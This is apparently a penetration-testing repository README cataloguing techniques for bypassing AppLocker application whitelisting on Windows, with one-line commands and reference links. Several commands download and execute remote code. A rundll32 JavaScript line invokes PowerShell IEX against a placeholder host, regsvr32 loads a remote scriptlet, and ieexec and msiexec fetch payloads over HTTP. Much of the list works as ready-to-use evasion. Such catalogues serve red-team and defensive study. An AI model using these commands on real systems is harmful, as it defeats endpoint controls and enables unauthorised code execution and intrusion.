The goal of this repository is to document the most common techniques to bypass AppLocker. This README file contains a complete list of all known bypasses. Since AppLocker can be configured in different ways it makes sense to have master list of bypasses. This README.MD will be the master and will be updated with known and possible AppLocker bypasses.
There are verified lists for EXE and DLL bypasses. These bypasses are based on the default rules created with AppLocker.
If you are wondering how to create the default rules you can follow this guide: https://www.rootusers.com/implement-applocker-rules/
Please contribute and do point out errors or resources I have forgotten. Remember that bypass techniques for BypassDLL and BypassEXE must be verified. The BypassDLL-DefaultRules and BypassEXE-DefaultRules list should only contain valid bypasses.
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32 shell32.dll,Control_RunDLL payload.dll
Requires admin: ?
Links:
https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Requires admin: No Bypasses:
Links:
https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
msbuild.exe pshell.xml
Requires admin: No
Links:
https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
https://github.com/Cn33liz/MSBuildShell
https://github.com/Cn33liz/MS17-012
https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
https://www.youtube.com/watch?v=aSDEAPXaz28
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
Requires admin: ?
Links:
https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
https://gist.githubusercontent.com/subTee/fb09ef511e592e6f7993/raw/e9b28e7955a5646672267a61e9685fc5a4ab5f2a/regsvcs.cs
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
Requires admin: ?
Links:
https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
https://gist.githubusercontent.com/subTee/fb09ef511e592e6f7993/raw/e9b28e7955a5646672267a61e9685fc5a4ab5f2a/regsvcs.cs
bginfo.exe bginfo.bgi /popup /nolicprompt
Requires admin: No
Links:
https://msitpros.com/?p=3831
https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
https://msitpros.com/?p=3860
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Requires admin: No
Links:
https://github.com/subTee/AllTheThings
https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
Open .diagcab package
Requires admin: ?
mshta.exe evilfile.hta
Requires admin: No
Links:
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
cmd.exe /k < script.txt
Requires admin: No
Links:
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
Get-Content script.txt | iex
Requires admin: No
Links:
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
cscript.exe //E:vbscript script.txt
Requires admin: No
Links:
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
Missing Example
Requires admin: ?
Links:
https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf
Missing Example
Requires admin: ?
Links:
https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf
ieexec.exe http://x.x.x.x:8080/bypass.exe
Requires admin: ?
Links:
https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
cdb.exe -cf x64_calc.wds -o notepad.exe
Requires admin: ?
Links:
http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
dnx.exe consoleapp
Requires admin: ?
Links:
https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
rcsi.exe bypass.csx
Requires admin: ?
Links:
https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
Missing example
Requires admin: ?
Control.exe
Requires admin: No
Links:
https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
msxsl.exe customers.xml script.xsl
Requires admin: No
Links:
https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1
msiexec /quiet /i cmd.msi msiexec /q /i http://192.168.100.3/tmp/cmd.png
Requires admin: ?
Links:
https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Requires admin: No
Links:
https://msitpros.com/?p=3960
https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll
Requires admin: No
Links: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
fsi.exe c:\folder\d.fscript
Requires admin: No
Links: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 https://twitter.com/NickTyrer/status/904273264385589248 https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/
odbcconf -f file.rsp
Requires admin: ?
Links: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b